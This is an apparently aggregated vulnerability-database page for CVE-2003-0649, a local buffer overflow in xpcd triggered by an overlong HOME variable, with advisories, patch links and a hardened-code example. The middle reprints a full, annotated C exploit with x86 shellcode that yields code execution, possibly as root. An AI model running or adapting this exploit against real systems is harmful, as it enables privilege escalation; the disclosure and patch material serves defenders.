CVE-2003-0649
CVSS7.2
Published: 2003-08-27 00:00:00
Revised: 2008-09-10 15:20:02

[Original] Buffer overflow in xpcd-svga for xpcd 2.08 and earlier allows local users to execute arbitrary code via a long HOME environment variable.


[CNNVD] XPCD HOME Environment Variable Local Buffer Overflow Vulnerability (CNNVD-200308-186)

        
        xpcd is a Photo CD tool for Linux systems.
        xpcd does not handle the HOME environment variable correctly. A local attacker can exploit this to perform a buffer overflow attack and possibly execute arbitrary commands on the system with root privileges.
        The attacker supplies an overly long value for the HOME environment variable; when xpcd is run, the buffer overflow is triggered, and carefully crafted data may allow arbitrary commands to be executed on the system with root privileges.
        

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [complete information disclosure, all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may result in complete system outage]
Access complexity: LOW [exploitation has no access restrictions]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0649
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0649
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200308-186
(official data source) CNNVD

- Other links and resources

http://www.debian.org/security/2003/dsa-368
(VENDOR_ADVISORY)  DEBIAN  DSA-368
http://www.mandriva.com/security/advisories?name=MDKSA-2004:053
(UNKNOWN)  MANDRAKE  MDKSA-2004:053

- Vulnerability information

XPCD HOME Environment Variable Local Buffer Overflow Vulnerability
Severity: High   Type: Boundary condition error
Published: 2003-08-27 00:00:00   Updated: 2005-10-20 00:00:00
Attack vector: Local
        
        

- Advisories and patches

        Vendor patches:
        Debian
        ------
        
        http://www.debian.org/security/2003/dsa-368

- Vulnerability information (22996)

XPCD 2.0.8 Home Environment Variable Local Buffer Overflow Vulnerability (EDBID:22996)
linux local
2003-07-18 Verified
0 r-code
N/A
source: http://www.securityfocus.com/bid/8370/info

A problem in the handling of long strings in environment variables by xpcd may result in a buffer overflow condition. This may allow an attacker to gain unauthorized access to system resources.

/**************************************************************************** 
 * xpcd 2.0.8 [latest] exploit written by r-code [Elite FXP Team] * 
 * * 
 * Actually xpcd usually isn`t suid, therefore for most of you * 
 * this exploit will be useless, on the other hand, maybe on some * 
 * conditions someone sets +S (who knows... ;-) * 
 * * 
 * Greetz to: czarny,|stachu|, Nitro, Zami, Razor, Jedlik, Cypher * 
 * Flames to: ElSiLaSoF - fucking kiddie.. * 
 ****************************************************************************/ 


#include <stdio.h> 
#include <unistd.h> 
#include <stdlib.h> 
#include <string.h>   /* memset, strlen, memcpy: missing from the original listing */


/* Returns the current stack pointer. The value is left in %eax, which is the
 * i386 return register; this only works on 32-bit x86 without optimisation. */
unsigned long int get_sp(void) { 
  __asm__("movl %esp,%eax"); 
} 


/* Linux/x86 payload exactly as published with the exploit (self-decoding). */
char shellcode[] = 
"\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x60\x80\x36" 
"\x01\x46\xe2\xfa\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01" 
"\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\x83\x10" 
"\x01\x01\xc6\x44\xfd\x01\x01\x01\x01\x8c\xba\x63\xef\xfe\xfe\x88\x7c\xf9\xb9" 
"\x47\x01\x01\x01\x30\xf7\x30\xc8\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a\x01" 
"\x01\x01\x88\xff\x30\xd3\x52\x88\xf2\xcc\x81\x5a\x5f\x5e\xc8\xc2\x8c\x77\x01" 
"\x91\x91\x91\x91"; 


#define LEN 280                      /* length of the HOME value that overruns the buffer */
#define DEFAULT_OFFSET 530           /* guessed distance between our %esp and the target frame */
#define PATH "/usr/local/bin/xpcd" 


int main(int argc,char **argv) { 
  register int i; 
  char *evilstr=0,*e=0; 
  unsigned long int retaddr=0,offset=DEFAULT_OFFSET; 
   
  printf("[=] xpcd0x01 exploit written by r-code d_fence(at)gmx(dot)net [ELITE FXP TEAM]\n"); 
  printf("[=] Greetz to: czarny,|stachu|, Nitro, Zami, Razor, Jedlik, Cypher\n"); 
  printf("[=] Flames to: ElSiLaSoF - fucking kiddie.\n\n"); 
   
  /* an optional first argument overrides the offset used to guess the return address */
  if(argc>1) 
    offset=atoi(argv[1]); 
   
  retaddr=get_sp() - offset; 
   
  printf("iNFO:) esp: 0x%lx offset: 0x%lx ret_addr: 0x%lx\n",get_sp(),offset,retaddr); 
  printf("iNFO:) If Doesn`t work, try with OFFSETS 400 - 600\n\n"); 
   
  evilstr=(char *)malloc(LEN+1);     /* +1: the original allocated LEN bytes but wrote the terminator at index LEN */
  e=(char *)malloc(LEN+10); 
   
  /* fill the whole value with the guessed return address, little-endian */
  for(i=0;i<(LEN);) { 
    evilstr[i++] = (retaddr & 0x000000ff); 
    evilstr[i++] = (retaddr & 0x0000ff00) >> 8; 
    evilstr[i++] = (retaddr & 0x00ff0000) >> 16; 
    evilstr[i++] = (retaddr & 0xff000000) >> 24; 
  } 
   
  /* first half becomes a sled of 'A' (inc %ecx on x86); the payload sits in the middle */
  memset(evilstr,'A',(LEN/2)); 
   
  for(i=0;i<(int)strlen(shellcode);i++) 
    evilstr[(LEN/2)-(strlen(shellcode)/2)+i]=shellcode[i]; 
   
  evilstr[LEN]=0x00; 
  /* export the oversized value as HOME and start the target, which copies it unchecked */
  memcpy(e,"HOME=",5); 
  memcpy(e+5,evilstr,LEN); 
  e[LEN+5]=0x00;                     /* the original relied on the malloc'd block happening to be zeroed */
  putenv(e); 
  execl(PATH,"xpcd",(char *)NULL); 
  return 0; 
} 

		

- Vulnerability information

6582
xpcd xpcd-svga HOME Variable Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

A local overflow exists in xpcd. xpcd fails to check the length of the HOME environment variable before copying it, resulting in a buffer overflow. By supplying a long string in $HOME, a local attacker can overflow the buffer and execute arbitrary code on the system with elevated privileges, resulting in a loss of integrity.
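The bug class described above, as an added illustration that is not xpcd's own code: a fixed-size buffer filled from $HOME with no length check, beside a bounded version that refuses oversized, empty or relative values instead of truncating silently. The buffer size PATHLEN and the file name .xpcdrc are assumptions, not taken from xpcd.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PATHLEN 256          /* assumed fixed buffer size, not xpcd's real one */
#define RCFILE  ".xpcdrc"    /* assumed config file name, not xpcd's real one */

/* Vulnerable pattern: the value of $HOME is copied into a fixed buffer
 * with no length check, so a value longer than PATHLEN overruns the
 * stack frame (the bug class behind CVE-2003-0649). Shown for contrast;
 * never call it with untrusted input. */
void build_rc_path_unchecked(const char *home, char out[PATHLEN]) {
    strcpy(out, home);
    strcat(out, "/" RCFILE);
}

/* Hardened version: bounded formatting, explicit failure when the value
 * would not fit, and rejection of unset, empty or relative HOME.
 * Returns 0 on success, -1 on error; on error out[] is an empty string. */
int build_rc_path(const char *home, char *out, size_t outlen) {
    if (outlen == 0) return -1;
    out[0] = '\0';
    if (home == NULL || home[0] == '\0' || home[0] != '/') return -1;
    int n = snprintf(out, outlen, "%s/%s", home, RCFILE);
    if (n < 0 || (size_t)n >= outlen) {   /* would truncate: treat as an error */
        out[0] = '\0';
        return -1;
    }
    return 0;
}

/* How a privileged tool should read HOME: through the bounded builder. */
int rc_path_from_env(char *out, size_t outlen) {
    return build_rc_path(getenv("HOME"), out, outlen);
}

int main(void) {
    char path[PATHLEN];
    if (rc_path_from_env(path, sizeof path) != 0) {
        fprintf(stderr, "HOME is unset, relative, or too long; refusing to continue\n");
        return 1;
    }
    printf("config file: %s\n", path);
    return 0;
}
```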

- Timeline

2003-06-18 Unknown
2003-06-18 Unknown

- Solution

Upgrade to version 2.08-8woody1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

XPCD Home Environment Variable Local Buffer Overflow Vulnerability
Class: Boundary Condition Error
Bugtraq ID: 8370
Remote: No
Local: Yes
Published: 2003-06-18 12:00:00
Updated: 2009-07-11 10:56:00
Discovery credited to r-code.

- Affected program versions

xpcd xpcd 2.0 8
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0

- Exploit

Exploit contributed by r-code.

- Solution

Debian has released advisory DSA 368-1 to address this issue.


xpcd xpcd 2.0 8

- References

     

     
